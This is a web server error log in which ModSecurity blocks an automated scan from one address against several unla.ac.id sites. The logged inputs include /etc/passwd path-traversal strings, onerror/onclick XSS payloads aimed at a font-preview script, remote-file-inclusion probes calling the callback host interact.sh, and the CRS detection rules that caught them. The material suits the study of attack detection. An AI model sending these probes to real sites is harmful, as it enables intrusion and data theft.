[Tue Aug 29 11:55:04.254554 2023] [:error] [pid 2705] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:chemin. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../ found within ARGS:chemin: ../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/pmb/opac_css/getgif.php"] [unique_id "ZO16KMCo-f0AAAqRzH8AAAAM"]
[Tue Aug 29 11:55:04.531228 2023] [:error] [pid 2611] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:font-family. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:font-family: '/onerror='alert(document.domain)'/b='"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/titan-framework/lib/iframe-font-preview.php"] [unique_id "ZO16KMCo-f0AAAoz8BQAAAAS"]
[Tue Aug 29 11:55:04.531765 2023] [:error] [pid 2647] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:font-family. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:font-family: '/onerror='alert(document.domain)'/b='"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/titan-framework/lib/iframe-font-preview.php"] [unique_id "ZO16KMCo-f0AAApXgkgAAAAU"]
[Tue Aug 29 11:55:04.536906 2023] [:error] [pid 2651] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:font-family. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:font-family: '/onerror='alert(document.domain)'/b='"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/titan-framework/lib/iframe-font-preview.php"] [unique_id "ZO16KMCo-f0AAApbUbMAAAAh"]
[Tue Aug 29 11:55:04.575863 2023] [:error] [pid 2712] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:font-family. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:font-family: '/onerror='alert(document.domain)'/b='"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/titan-framework/lib/iframe-font-preview.php"] [unique_id "ZO16KMCo-f0AAAqY5@8AAAAr"]
[Tue Aug 29 11:55:04.576157 2023] [:error] [pid 2611] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:chemin. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../ found within ARGS:chemin: ../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/opac_css/getgif.php"] [unique_id "ZO16KMCo-f0AAAoz8BYAAAAS"]
[Tue Aug 29 11:55:04.619339 2023] [:error] [pid 2721] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:font-family. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:font-family: '/onerror='alert(document.domain)'/b='"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/titan-framework/lib/iframe-font-preview.php"] [unique_id "ZO16KMCo-f0AAAqhODIAAAAE"]
[Tue Aug 29 11:55:04.645156 2023] [:error] [pid 2651] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:font-weight. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:font-weight: ' onerror=alert(document.domain) b='"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/titan-framework/lib/iframe-font-preview.php"] [unique_id "ZO16KMCo-f0AAApbUbYAAAAh"]
[Tue Aug 29 11:55:04.664534 2023] [:error] [pid 2651] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:font-weight. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:font-weight: ' onerror=alert(document.domain) b='"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/titan-framework/lib/iframe-font-preview.php"] [unique_id "ZO16KMCo-f0AAApbUbcAAAAh"]
[Tue Aug 29 11:55:05.535045 2023] [:error] [pid 2647] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:chemin. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../ found within ARGS:chemin: ../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/pmb/opac_css/getgif.php"] [unique_id "ZO16KcCo-f0AAApXgk4AAAAU"]
[Tue Aug 29 11:55:05.591850 2023] [:error] [pid 2650] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:font-weight. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:font-weight: ' onerror=alert(document.domain) b='"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/titan-framework/lib/iframe-font-preview.php"] [unique_id "ZO16KcCo-f0AAApa-LMAAAAg"]
[Tue Aug 29 11:55:05.622734 2023] [:error] [pid 2732] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:font-weight. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:font-weight: ' onerror=alert(document.domain) b='"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/titan-framework/lib/iframe-font-preview.php"] [unique_id "ZO16KcCo-f0AAAqsV1wAAAAB"]
[Tue Aug 29 11:55:05.675640 2023] [:error] [pid 2631] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:font-weight. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:font-weight: ' accesskey='x' onclick='alert(document.domain)' class='"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/titan-framework/lib/iframe-font-preview.php"] [unique_id "ZO16KcCo-f0AAApHRcMAAAAP"]
[Tue Aug 29 11:55:05.796339 2023] [:error] [pid 2650] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:font-weight. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:font-weight: ' onerror=alert(document.domain) b='"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/titan-framework/lib/iframe-font-preview.php"] [unique_id "ZO16KcCo-f0AAApa-LgAAAAg"]
[Tue Aug 29 11:55:05.979739 2023] [:error] [pid 2705] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "unla.ac.id"] [uri "/wp-admin/admin-post.php"] [unique_id "ZO16KcCo-f0AAAqRzI0AAAAM"]
[Tue Aug 29 11:55:06.036459 2023] [:error] [pid 2631] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:font-weight. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:font-weight: ' accesskey='x' onclick='alert(document.domain)' class='"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/titan-framework/lib/iframe-font-preview.php"] [unique_id "ZO16KsCo-f0AAApHRcoAAAAP"]
[Tue Aug 29 11:55:06.062521 2023] [:error] [pid 2647] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "journal.unla.ac.id"] [uri "/wp-admin/admin-post.php"] [unique_id "ZO16KsCo-f0AAApXglYAAAAU"]
[Tue Aug 29 11:55:06.084868 2023] [:error] [pid 2631] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "ft.unla.ac.id"] [uri "/wp-admin/admin-post.php"] [unique_id "ZO16KsCo-f0AAApHRcwAAAAP"]
[Tue Aug 29 11:55:06.087922 2023] [:error] [pid 2705] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "informatika.unla.ac.id"] [uri "/wp-admin/admin-post.php"] [unique_id "ZO16KsCo-f0AAAqRzJAAAAAM"]
[Tue Aug 29 11:55:06.106464 2023] [:error] [pid 2651] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "pusatbahasa.unla.ac.id"] [uri "/wp-admin/admin-post.php"] [unique_id "ZO16KsCo-f0AAApbUboAAAAh"]
[Tue Aug 29 11:55:06.551117 2023] [:error] [pid 2647] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:font-weight. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:font-weight: ' accesskey='x' onclick='alert(document.domain)' class='"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/titan-framework/lib/iframe-font-preview.php"] [unique_id "ZO16KsCo-f0AAApXgloAAAAU"]
[Tue Aug 29 11:55:06.553188 2023] [:error] [pid 2651] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:img. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../ found within ARGS:img: ../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/components/com_rwcards/captcha/captcha_image.php"] [unique_id "ZO16KsCo-f0AAApbUbwAAAAh"]
[Tue Aug 29 11:55:06.636811 2023] [:error] [pid 2611] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:img. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../ found within ARGS:img: ../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/components/com_rwcards/captcha/captcha_image.php"] [unique_id "ZO16KsCo-f0AAAoz8B8AAAAS"]
[Tue Aug 29 11:55:06.644213 2023] [:error] [pid 2732] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "www.unla.ac.id"] [uri "/wp-admin/admin-post.php"] [unique_id "ZO16KsCo-f0AAAqsV2UAAAAB"]
[Tue Aug 29 11:55:06.649081 2023] [:error] [pid 2647] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:img. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../ found within ARGS:img: ../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/components/com_rwcards/captcha/captcha_image.php"] [unique_id "ZO16KsCo-f0AAApXgl4AAAAU"]
[Tue Aug 29 11:55:06.664493 2023] [:error] [pid 2732] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:font-weight. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:font-weight: ' accesskey='x' onclick='alert(document.domain)' class='"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/titan-framework/lib/iframe-font-preview.php"] [unique_id "ZO16KsCo-f0AAAqsV2YAAAAB"]
[Tue Aug 29 11:55:06.701041 2023] [:error] [pid 2647] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:img. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../ found within ARGS:img: ../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/components/com_rwcards/captcha/captcha_image.php"] [unique_id "ZO16KsCo-f0AAApXgmAAAAAU"]
[Tue Aug 29 11:55:06.705100 2023] [:error] [pid 2721] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:img. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../ found within ARGS:img: ../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/components/com_rwcards/captcha/captcha_image.php"] [unique_id "ZO16KsCo-f0AAAqhODwAAAAE"]
[Tue Aug 29 11:55:06.707565 2023] [:error] [pid 2611] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:font-family. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:font-family: '/onerror='alert(document.domain)'/b='"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/titan-framework/lib/iframe-font-preview.php"] [unique_id "ZO16KsCo-f0AAAoz8CIAAAAS"]
[Tue Aug 29 11:55:07.651882 2023] [:error] [pid 2732] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:img. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../ found within ARGS:img: ../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/components/com_rwcards/captcha/captcha_image.php"] [unique_id "ZO16K8Co-f0AAAqsV2kAAAAB"]
[Tue Aug 29 11:55:07.717585 2023] [:error] [pid 2707] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:font-weight. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:font-weight: ' accesskey='x' onclick='alert(document.domain)' class='"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/titan-framework/lib/iframe-font-preview.php"] [unique_id "ZO16K8Co-f0AAAqTvoAAAAAa"]
[Tue Aug 29 11:55:07.831330 2023] [:error] [pid 2706] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:font-weight. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:font-weight: ' onerror=alert(document.domain) b='"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/titan-framework/lib/iframe-font-preview.php"] [unique_id "ZO16K8Co-f0AAAqSwoQAAAAN"]
